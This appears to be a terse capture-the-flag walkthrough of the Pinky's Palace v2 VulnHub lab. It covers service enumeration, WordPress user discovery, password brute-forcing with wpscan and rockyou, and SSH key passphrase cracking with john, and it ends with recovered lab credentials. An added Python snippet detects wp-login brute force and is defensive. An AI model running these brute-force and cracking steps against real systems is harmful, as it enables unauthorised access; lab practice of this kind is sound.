PINKY’S PALACE: V2 Walkthrough
Description: A realistic Boot2Root. Gain access to the system and read the /root/root.txt.
Note From VulnHub: Wordpress will not render correctly. You will need to alter your host file with the IP shown on the console: echo 192.168.x.x pinkydb | sudo tee -a /etc/hosts
Enumeration
Let’s enumerate. Ports: 4655, 7654, 31337.
Nothing from those ports.
More Enumeration…
whatweb http://192.168.103.172
Apache[2.4.25], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[192.168.103.172], JQuery[1.12.4], MetaGenerator[WordPress 4.9.4], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[Pinky's Blog – Just another WordPress site], UncommonHeaders[link], WordPress[4.9.4]
1. Manual Exploration
Nothing critical
2. Nikto
- /wp-links-opml.php
- /wp-login.php
3. Gobuster
…
Let’s enumerate WordPress:
📌 Found a user: pinky1337
No critical plugin or theme.
Finding Point Of Intrusion (POI)
Let’s brute-force the username we got.
1. cewl http://pinkydb -w pass.txt -> to generate the password list
wpscan --url http://pinkydb -U pinky1337 -P pass.txt
- No password found
2. Rockyou
wpscan --url http://pinkydb -U pinky1337 -P /usr/share/wordlists/rockyou.txt
- Not found in a few minutes…
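Seen from the defender's side, wordlist runs like the two above leave a burst of failed POSTs to /wp-login.php in the Apache access log. The following is an added example, not part of the original walkthrough, that flags that pattern; the log lines, client addresses, threshold and window are constructed assumptions, and guessing through xmlrpc.php is not covered.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined log format: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def failed_logins(lines):
    """Yield (ip, time) per failed login: WordPress answers a bad
    password with 200 and a good one with a 302 redirect."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["status"] != "200":
            continue
        if m["path"].split("?", 1)[0] == "/wp-login.php":
            yield m["ip"], datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: time of first alert} for clients with at least
    `threshold` failed logins inside a sliding `window`."""
    recent, alerts = defaultdict(deque), {}
    for ip, ts in failed_logins(lines):
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts.setdefault(ip, ts)
    return alerts

def _line(ip, sec, method, status):
    # Build one constructed access-log line (not taken from the target VM).
    return (f'{ip} - - [10/Mar/2018:12:00:{sec:02d} +0000] '
            f'"{method} /wp-login.php HTTP/1.1" {status} 1234 "-" "constructed"')

# Constructed sample: .10 guesses six passwords, .20 mistypes once then logs in, .30 only views the form.
SAMPLE_LOG = (
    [_line("192.0.2.10", s, "POST", 200) for s in range(0, 12, 2)]
    + [_line("192.0.2.20", 5, "POST", 200),
       _line("192.0.2.20", 9, "POST", 302),
       _line("192.0.2.30", 7, "GET", 200)])

if __name__ == "__main__":
    for ip, ts in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {ip}: repeated failed logins, threshold hit at {ts:%H:%M:%S}")
```
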
Let’s try port knocking,
There is a login page on 7654,
Let’s brute force…
john --rules --wordlist=pass.txt --stdout | tee wordlist.txt
Credentials: pinky:Passione
python ssh2john.py id_rsa > id_rsajohn
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsajohn
Stefano:secretz101